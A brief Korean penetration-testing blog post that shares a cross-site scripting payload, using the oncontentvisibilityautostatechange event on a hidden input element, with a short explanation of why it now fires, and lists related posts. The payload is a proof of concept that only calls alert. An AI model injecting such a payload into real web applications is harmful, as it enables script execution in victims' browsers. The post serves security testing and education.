annyoung

XSS input hidden 본문

모의해킹

XSS input hidden

nopsled 2025. 2. 11. 16:55
<input type=hidden oncontentvisibilityautostatechange=alert(document.domain) style=content-visibility:auto>

 

2024년 7월 25일에 추가된 WebAPI oncontentvisibilityautostatechange 덕분에 input type이 hidden인 경우에도 XSS를 트리거할 수 있게 되었다.

 

 * 페이로드 출처: https://x.com/kinugawamasato/status/1816234368714871185

 

 

 

'모의해킹' 카테고리의 다른 글

Union SQL Injection(MySQL)  (0) 2025.02.27
파일 다운로드 취약점  (0) 2025.02.21
ms teams가 sourcemap에 대하는 자세  (0) 2024.11.01
React Native 디컴파일  (0) 2024.10.25
Unreal Engine 4.27.2 dump with split apk  (48) 2024.07.25
Comments